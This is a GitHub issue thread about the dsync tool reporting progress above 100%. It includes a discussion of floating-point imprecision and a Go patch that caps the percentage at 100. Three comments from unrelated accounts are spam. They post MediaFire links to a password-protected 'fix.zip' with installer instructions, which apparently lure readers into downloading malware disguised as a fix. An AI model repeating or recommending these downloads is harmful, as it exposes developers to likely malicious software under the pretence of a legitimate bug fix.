### ISSUE TITLE
100.14% complete in total progress

### ISSUE THREAD

**Issue by alex-thc** [adiom-data/dsync#52]
Saw this once. Need to investigate

**Comment by SamuelMarks** [comment]
Probably here
https://github.com/adiom-data/dsync/blob/a179c2d67d507b8b85a242b4876e4a1d97b6c33e/internal/app/progress.go#L149-L200

**Comment by SamuelMarks** [comment]
Probably here
https://github.com/adiom-data/dsync/blob/a179c2d67d507b8b85a242b4876e4a1d97b6c33e/internal/app/progress.go#L149-L200

You can just [`Math.max`](https://pkg.go.dev/math#Max) it against 100

**Comment by alex-thc** [comment]
Do you think it's just a benign overflow somewhere? Math.max against 100 would work, but would also mask the issue (if there's any)

**Comment by SamuelMarks** [comment]
Oh it's just your basic floating point imprecision error. Plenty of these are throughout the TensorFlow codebase so they just changed the doctest routine to do almostEqual checks; within a specified `threshold`.

**Comment by SamuelMarks** [comment]
Oh it's just your basic floating point imprecision error. Plenty of these are throughout the TensorFlow codebase so they just changed the doctest routine to do `almostEqual` checks; within a specified `threshold`.

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SamuelMarks** [comment]
```patch
From 9eb6d25113a3ba7279d98fccfafb96e881bf6b22 Mon Sep 17 00:00:00 2001
From: Samuel Marks <807580+SamuelMarks@users.noreply.github.com>
Date: Wed, 28 Aug 2024 12:23:01 -0500
Subject: [PATCH] [internal/app/progress.go] Upper level bounds on percentages

---
 internal/app/progress.go | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/internal/app/progress.go b/internal/app/progress.go
index daf1701..a16fe06 100644
--- a/internal/app/progress.go
+++ b/internal/app/progress.go
@@ -106,7 +106,7 @@ func (tv *TViewDetails) GetStatusReport(runnerProgress runnerLocal.RunnerSyncPro
 
 		totalPercentComplete := percentCompleteTotal(runnerProgress)
 
-		progress := int(math.Floor((totalPercentComplete / 100 * float64(progressBarWidth))))
+		progress := int(math.Floor(totalPercentComplete / 100 * float64(progressBarWidth)))
 		progressBarString := fmt.Sprintf("[%s%s] %.2f%%		%.2f docs/sec\n\n", strings.Repeat(string('#'), progress), strings.Repeat(" ", progressBarWidth-progress), totalPercentComplete, runnerProgress.Throughput)
 		progressBar.SetText(progressBarString)
 
@@ -156,7 +156,7 @@ func percentCompleteTotal(progress runnerLocal.RunnerSyncProgress) float64 {
 	}
 	percentComplete = docsCopied / totalDocs * 100
 
-	return percentComplete
+	return min(100, percentComplete)
 
 }
 
@@ -196,5 +196,5 @@ func percentCompleteNamespace(nsStatus *iface.NamespaceStatus) (float64, float64
 		numerator = float64(numCompletedDocs + numDocsInProgress)
 		denominator = float64(numCompletedDocs + numDocsLeft)
 	}
-	return percentComplete, numerator, denominator
+	return min(100, percentComplete), numerator, denominator
 }
-- 
2.43.0

```

**Comment by alex-thc** [comment]
Thank you @SamuelMarks !
